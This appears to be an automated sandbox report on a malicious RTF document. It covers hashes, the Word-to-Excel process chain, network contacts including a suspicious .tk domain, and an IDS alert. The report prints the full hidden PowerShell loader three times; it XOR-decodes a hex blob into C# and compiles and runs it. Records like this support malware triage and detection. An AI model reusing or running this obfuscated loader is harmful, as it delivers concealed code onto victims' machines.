File name: | Unconfirmed 367264.crdownload |
Full analysis: | https://app.any.run/tasks/f2bc43b2-42c6-498b-95eb-2ca18f23bcba |
Verdict: | Malicious activity |
Analysis date: | September 18, 2019, 19:08:24 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | 9925AAE2E5BD9954D132E8C72AD44E58 |
SHA1: | 28824B6FA1C3A98271348294304F9C0B414C39F8 |
SHA256: | 4CA5872ADA793C013ADB0025ABFF3CA7D07345F0A52F93CCD24C474E54792324 |
SSDEEP: | 3072:oHdXciMyH6vS64XciMyH6vS64XciMyH6vS64XciMyH6vS64XciMyH6vS64XciMyi:qhoohoohoohoohoohoohoyS |
.rtf | | | Rich Text Format (100) |
---|
InternalVersionNumber: | 57435 |
---|---|
CharactersWithSpaces: | 4 |
Characters: | 4 |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
RevisionNumber: | 1 |
ModifyDate: | 2019:01:07 23:54:00 |
CreateDate: | 2019:01:07 23:54:00 |
LastModifiedBy: | Admin |
Author: | Admin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3436 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Unconfirmed 367264.crdownload.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2520 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2400 | powershell -WindowStyle Hidden function oad4c4 { param($qa89651) $se84a8 = 'm888a2';$zae81 = ''; for ($i = 0; $i -lt $qa89651.length; $i+=2) { $e176d3 = [convert]::ToByte($qa89651.Substring($i, 2), 16); $zae81 += [char]($e176d3 -bxor $se84a8[($i / 2) % $se84a8.length]); } return $zae81; } $c275a7 = '184b515606123e414b4c045f564d4b510f554d6b414b155700166a4d0f4604555d16285c195d4a571161084a4e5102571e034d4b085c0a186b4112460855167c08530a56574b155b0e4b034d125b035f186b1841195d5516287d564d4b510f554d6b414b15570016765d15096032484d035e045b185b0d531e4b18405703595b595d1a69295454710c42024a4c104359084a565d0d015f1a147d0f461f416857085c19051a7f04463d4a575b2056094a5d4b121044651848145001515b1812460c4c515b4157154c5d4a0f1224564c6815404d4a5a0f56004571564c31461f18520f00010b0e144b154004565f1806545b590d01561b56637c540d7b0048574a151a4f535d4a0f57010b0a1a4d1228564c4a18620251564c410f4d1a7457005621515a4a0040141a11654142185a545102121e4c594c08514d5d404c0440031871561562194a184e530a5e01104b154004565f1814560c0e0001001b56637c540d7b0048574a151a4f535d4a0f57010b0a1a4d1228564c4a18620251564c5c103b514a4c145301684a5715570e4c1a113c121d4d5a5408514d4b4c59155b0e185d4015571f56185a0e5d01185d0d04535a5d10710f463d4c4a180c03555d0c5d4d6724564c6815404d52090b590141184d510f464d525b0105010814185714464d4d51561512010a5b0b030a4403637c0d5e245548571346451a735d135c08540b0a4f5601541a144177034c4a41315d04564c054360195475571757205d5557134b4f14186b044621594b4c24401f574a050753014b5d113c121e4c594c08514d5d404c044003184e5708564d555c5a04564571564c31461f185c0f00060b0c5e14285c19684c4a41405c090c0d4d5b034c185952510c5c5e115a42185a545102121e4c594c08514d51564c41470e0e0d0f581a444371561562194a18560704585c0f0d410f4d4e0a00520b4557595c555159101a080207580c5a0d50060b0d0e085007591a11115a5b0b10565e5707090f0d055c7b034c684c131c375d4a5748490a574c5741510e0a5d095a4f24564c6815404d400a5c0503504a5a0f560045565e0e54565a0d14570056595b0c1043000e0d0d0c03075c0b0a0d50020e0d0e0f000609080f0d5502550c591a481b56515e101900095c09055c7b034c684c131c375d4a5748490a574c5741510e0a5d095a4f3871564c31461f18565a53575905106d285c19684c4a4807564d515615121e005d5d02040e050803085445195d0d04535a5d10405356090914560300080c140819065d14574d15121e005d5d02040e111143065d1957185b020008090345234b195d6365415955590a0053065043084052034108405e071e5d4001081c0924564c6815404d555e01530b54057559134105595416205e01575b70265e025a5954490144037559134105595416225d1d41105359535f000a0c4d0241555e01530b54140b115a5f095a5d5c495c084f18710f463d4c4a101900095c0916355d24564c0e551a4413084051025c5a11140c54540a01014d0144035b5b53575c02186f04502e54515d0f464d425c00520150565d4f4165085a7b540857034c10115a41194a51560612140b5d0e580358057d56175b1f575655045c19167f5d157402545c5d13620c4c5010245c1b514a570f5f08564c163242085b51590d7402545c5d131c2c48485408510c4c51570f760c4c59114a1031644d0a040a081a13570056595b0c1043065e0d5c0c5107091a11031b56550b0b16255d1a56545700562b51545d495d0c5c0c5b551a4f080d0c02060e0c000d0303090c0a0c02075d0d090953030b085b0800020c090e095407540c0a0d5007580d010857075a0c0a0d56070e0d0f0c07075a090d0d05104414410b040454090d115a621f575b5d12413e4c594a157b035e57181206585e59050f571a18684a0e51084b4b6b15531f4c7156075d45410b5d570b5c0d11033140025b5d4b121c3e4c594a151a1e0c0d5e001b564a5d4c1440031808031c42185a545102121e4c594c08514d4b4c4a085c0a18575905060e0c104b154004565f181b005a010c111a41194a51560612070f590b0704501a5500590a0c0a1a0312461f51565f41445f000b015c61194a5156061c2855484c18090b574a10085c1918510551090404420a560b5916745d0f55195003514a0f5f11435a184608184a5a56055f057b570f44084a4c16355d2f414c5d49485f0f010c4f61185a4b4c135b035f10514d004414090e48091b0a000b581950105b50004044104a5a56055f1866180b050c0b5e0e3a1a04170a1141174d520f5952545b16745d0f55195065115a4f1f5d4c4d135c4d4e0a00520b564545'; $c275a72 = oad4c4($c275a7); Add-Type -TypeDefinition $c275a72; [x614cae]::uc6579(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2052 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2228 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\tl6fa_gt.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
2372 | powershell -WindowStyle Hidden function oad4c4 { param($qa89651) $se84a8 = 'm888a2';$zae81 = ''; for ($i = 0; $i -lt $qa89651.length; $i+=2) { $e176d3 = [convert]::ToByte($qa89651.Substring($i, 2), 16); $zae81 += [char]($e176d3 -bxor $se84a8[($i / 2) % $se84a8.length]); } return $zae81; } $c275a7 = '184b515606123e414b4c045f564d4b510f554d6b414b155700166a4d0f4604555d16285c195d4a571161084a4e5102571e034d4b085c0a186b4112460855167c08530a56574b155b0e4b034d125b035f186b1841195d5516287d564d4b510f554d6b414b15570016765d15096032484d035e045b185b0d531e4b18405703595b595d1a69295454710c42024a4c104359084a565d0d015f1a147d0f461f416857085c19051a7f04463d4a575b2056094a5d4b121044651848145001515b1812460c4c515b4157154c5d4a0f1224564c6815404d4a5a0f56004571564c31461f18520f00010b0e144b154004565f1806545b590d01561b56637c540d7b0048574a151a4f535d4a0f57010b0a1a4d1228564c4a18620251564c410f4d1a7457005621515a4a0040141a11654142185a545102121e4c594c08514d5d404c0440031871561562194a184e530a5e01104b154004565f1814560c0e0001001b56637c540d7b0048574a151a4f535d4a0f57010b0a1a4d1228564c4a18620251564c5c103b514a4c145301684a5715570e4c1a113c121d4d5a5408514d4b4c59155b0e185d4015571f56185a0e5d01185d0d04535a5d10710f463d4c4a180c03555d0c5d4d6724564c6815404d52090b590141184d510f464d525b0105010814185714464d4d51561512010a5b0b030a4403637c0d5e245548571346451a735d135c08540b0a4f5601541a144177034c4a41315d04564c054360195475571757205d5557134b4f14186b044621594b4c24401f574a050753014b5d113c121e4c594c08514d5d404c044003184e5708564d555c5a04564571564c31461f185c0f00060b0c5e14285c19684c4a41405c090c0d4d5b034c185952510c5c5e115a42185a545102121e4c594c08514d51564c41470e0e0d0f581a444371561562194a18560704585c0f0d410f4d4e0a00520b4557595c555159101a080207580c5a0d50060b0d0e085007591a11115a5b0b10565e5707090f0d055c7b034c684c131c375d4a5748490a574c5741510e0a5d095a4f24564c6815404d400a5c0503504a5a0f560045565e0e54565a0d14570056595b0c1043000e0d0d0c03075c0b0a0d50020e0d0e0f000609080f0d5502550c591a481b56515e101900095c09055c7b034c684c131c375d4a5748490a574c5741510e0a5d095a4f3871564c31461f18565a53575905106d285c19684c4a4807564d515615121e005d5d02040e050803085445195d0d04535a5d10405356090914560300080c140819065d14574d15121e005d5d02040e111143065d1957185b020008090345234b195d6365415955590a0053065043084052034108405e071e5d4001081c0924564c6815404d555e01530b54057559134105595416205e01575b70265e025a5954490144037559134105595416225d1d41105359535f000a0c4d0241555e01530b54140b115a5f095a5d5c495c084f18710f463d4c4a101900095c0916355d24564c0e551a4413084051025c5a11140c54540a01014d0144035b5b53575c02186f04502e54515d0f464d425c00520150565d4f4165085a7b540857034c10115a41194a51560612140b5d0e580358057d56175b1f575655045c19167f5d157402545c5d13620c4c5010245c1b514a570f5f08564c163242085b51590d7402545c5d131c2c48485408510c4c51570f760c4c59114a1031644d0a040a081a13570056595b0c1043065e0d5c0c5107091a11031b56550b0b16255d1a56545700562b51545d495d0c5c0c5b551a4f080d0c02060e0c000d0303090c0a0c02075d0d090953030b085b0800020c090e095407540c0a0d5007580d010857075a0c0a0d56070e0d0f0c07075a090d0d05104414410b040454090d115a621f575b5d12413e4c594a157b035e57181206585e59050f571a18684a0e51084b4b6b15531f4c7156075d45410b5d570b5c0d11033140025b5d4b121c3e4c594a151a1e0c0d5e001b564a5d4c1440031808031c42185a545102121e4c594c08514d4b4c4a085c0a18575905060e0c104b154004565f181b005a010c111a41194a51560612070f590b0704501a5500590a0c0a1a0312461f51565f41445f000b015c61194a5156061c2855484c18090b574a10085c1918510551090404420a560b5916745d0f55195003514a0f5f11435a184608184a5a56055f057b570f44084a4c16355d2f414c5d49485f0f010c4f61185a4b4c135b035f10514d004414090e48091b0a000b581950105b50004044104a5a56055f1866180b050c0b5e0e3a1a04170a1141174d520f5952545b16745d0f55195065115a4f1f5d4c4d135c4d4e0a00520b564545'; $c275a72 = oad4c4($c275a7); Add-Type -TypeDefinition $c275a72; [x614cae]::uc6579(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3244 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3504 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESAF31.tmp" "c:\Users\admin\AppData\Local\Temp\CSCAF30.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
3896 | powershell -WindowStyle Hidden function oad4c4 { param($qa89651) $se84a8 = 'm888a2';$zae81 = ''; for ($i = 0; $i -lt $qa89651.length; $i+=2) { $e176d3 = [convert]::ToByte($qa89651.Substring($i, 2), 16); $zae81 += [char]($e176d3 -bxor $se84a8[($i / 2) % $se84a8.length]); } return $zae81; } $c275a7 = '184b515606123e414b4c045f564d4b510f554d6b414b155700166a4d0f4604555d16285c195d4a571161084a4e5102571e034d4b085c0a186b4112460855167c08530a56574b155b0e4b034d125b035f186b1841195d5516287d564d4b510f554d6b414b15570016765d15096032484d035e045b185b0d531e4b18405703595b595d1a69295454710c42024a4c104359084a565d0d015f1a147d0f461f416857085c19051a7f04463d4a575b2056094a5d4b121044651848145001515b1812460c4c515b4157154c5d4a0f1224564c6815404d4a5a0f56004571564c31461f18520f00010b0e144b154004565f1806545b590d01561b56637c540d7b0048574a151a4f535d4a0f57010b0a1a4d1228564c4a18620251564c410f4d1a7457005621515a4a0040141a11654142185a545102121e4c594c08514d5d404c0440031871561562194a184e530a5e01104b154004565f1814560c0e0001001b56637c540d7b0048574a151a4f535d4a0f57010b0a1a4d1228564c4a18620251564c5c103b514a4c145301684a5715570e4c1a113c121d4d5a5408514d4b4c59155b0e185d4015571f56185a0e5d01185d0d04535a5d10710f463d4c4a180c03555d0c5d4d6724564c6815404d52090b590141184d510f464d525b0105010814185714464d4d51561512010a5b0b030a4403637c0d5e245548571346451a735d135c08540b0a4f5601541a144177034c4a41315d04564c054360195475571757205d5557134b4f14186b044621594b4c24401f574a050753014b5d113c121e4c594c08514d5d404c044003184e5708564d555c5a04564571564c31461f185c0f00060b0c5e14285c19684c4a41405c090c0d4d5b034c185952510c5c5e115a42185a545102121e4c594c08514d51564c41470e0e0d0f581a444371561562194a18560704585c0f0d410f4d4e0a00520b4557595c555159101a080207580c5a0d50060b0d0e085007591a11115a5b0b10565e5707090f0d055c7b034c684c131c375d4a5748490a574c5741510e0a5d095a4f24564c6815404d400a5c0503504a5a0f560045565e0e54565a0d14570056595b0c1043000e0d0d0c03075c0b0a0d50020e0d0e0f000609080f0d5502550c591a481b56515e101900095c09055c7b034c684c131c375d4a5748490a574c5741510e0a5d095a4f3871564c31461f18565a53575905106d285c19684c4a4807564d515615121e005d5d02040e050803085445195d0d04535a5d10405356090914560300080c140819065d14574d15121e005d5d02040e111143065d1957185b020008090345234b195d6365415955590a0053065043084052034108405e071e5d4001081c0924564c6815404d555e01530b54057559134105595416205e01575b70265e025a5954490144037559134105595416225d1d41105359535f000a0c4d0241555e01530b54140b115a5f095a5d5c495c084f18710f463d4c4a101900095c0916355d24564c0e551a4413084051025c5a11140c54540a01014d0144035b5b53575c02186f04502e54515d0f464d425c00520150565d4f4165085a7b540857034c10115a41194a51560612140b5d0e580358057d56175b1f575655045c19167f5d157402545c5d13620c4c5010245c1b514a570f5f08564c163242085b51590d7402545c5d131c2c48485408510c4c51570f760c4c59114a1031644d0a040a081a13570056595b0c1043065e0d5c0c5107091a11031b56550b0b16255d1a56545700562b51545d495d0c5c0c5b551a4f080d0c02060e0c000d0303090c0a0c02075d0d090953030b085b0800020c090e095407540c0a0d5007580d010857075a0c0a0d56070e0d0f0c07075a090d0d05104414410b040454090d115a621f575b5d12413e4c594a157b035e57181206585e59050f571a18684a0e51084b4b6b15531f4c7156075d45410b5d570b5c0d11033140025b5d4b121c3e4c594a151a1e0c0d5e001b564a5d4c1440031808031c42185a545102121e4c594c08514d4b4c4a085c0a18575905060e0c104b154004565f181b005a010c111a41194a51560612070f590b0704501a5500590a0c0a1a0312461f51565f41445f000b015c61194a5156061c2855484c18090b574a10085c1918510551090404420a560b5916745d0f55195003514a0f5f11435a184608184a5a56055f057b570f44084a4c16355d2f414c5d49485f0f010c4f61185a4b4c135b035f10514d004414090e48091b0a000b581950105b50004044104a5a56055f1866180b050c0b5e0e3a1a04170a1141174d520f5952545b16745d0f55195065115a4f1f5d4c4d135c4d4e0a00520b564545'; $c275a72 = oad4c4($c275a7); Add-Type -TypeDefinition $c275a72; [x614cae]::uc6579(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2704 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3436 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9CB2.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2520 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA472.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2052 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRAB29.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2400 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VMLZC941EL7W7FCKY09R.temp | — | |
MD5:— | SHA256:— | |||
3244 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRAEB3.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2228 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCAF30.tmp | — | |
MD5:— | SHA256:— | |||
3504 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESAF31.tmp | — | |
MD5:— | SHA256:— | |||
2228 | csc.exe | C:\Users\admin\AppData\Local\Temp\tl6fa_gt.out | — | |
MD5:— | SHA256:— | |||
2372 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KWXJLPI3G36A6WGS7DMV.temp | — | |
MD5:— | SHA256:— | |||
2704 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRB2CA.tmp.cvr | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2484 | iexplore.exe | GET | 301 | 2.16.186.27:80 | http://shell.windows.com/fileassoc/fileassoc.asp?Ext=DS_Store | unknown | — | — | whitelisted |
2484 | iexplore.exe | GET | 200 | 2.16.106.233:80 | http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab | unknown | compressed | 57.0 Kb | whitelisted |
3916 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
2484 | iexplore.exe | GET | 200 | 2.16.106.233:80 | http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/47BEABC922EAE80E78783462A79F45C254FDE68B.crt | unknown | der | 969 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3916 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3916 | iexplore.exe | 204.79.197.200:443 | www.bing.com | Microsoft Corporation | US | whitelisted |
2484 | iexplore.exe | 40.90.23.153:443 | login.live.com | Microsoft Corporation | US | unknown |
2484 | iexplore.exe | 2.19.38.59:80 | go.microsoft.com | Akamai International B.V. | — | whitelisted |
2484 | iexplore.exe | 204.79.197.200:443 | www.bing.com | Microsoft Corporation | US | whitelisted |
2484 | iexplore.exe | 2.16.186.27:80 | shell.windows.com | Akamai International B.V. | — | whitelisted |
2484 | iexplore.exe | 172.217.16.138:443 | ajax.googleapis.com | Google Inc. | US | whitelisted |
2484 | iexplore.exe | 66.39.64.146:443 | file.org | pair Networks | US | malicious |
2484 | iexplore.exe | 52.164.210.24:443 | consent.cookiebot.com | Microsoft Corporation | IE | whitelisted |
2484 | iexplore.exe | 216.58.206.10:443 | fonts.googleapis.com | Google Inc. | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
this-a22.tk |
| suspicious |
www.bing.com |
| whitelisted |
go.microsoft.com |
| whitelisted |
shell.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
file.org |
| whitelisted |
fonts.googleapis.com |
| whitelisted |
kcdn.file.org |
| whitelisted |
maxcdn.bootstrapcdn.com |
| whitelisted |
ajax.googleapis.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET DNS Query to a .tk domain - Likely Hostile |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|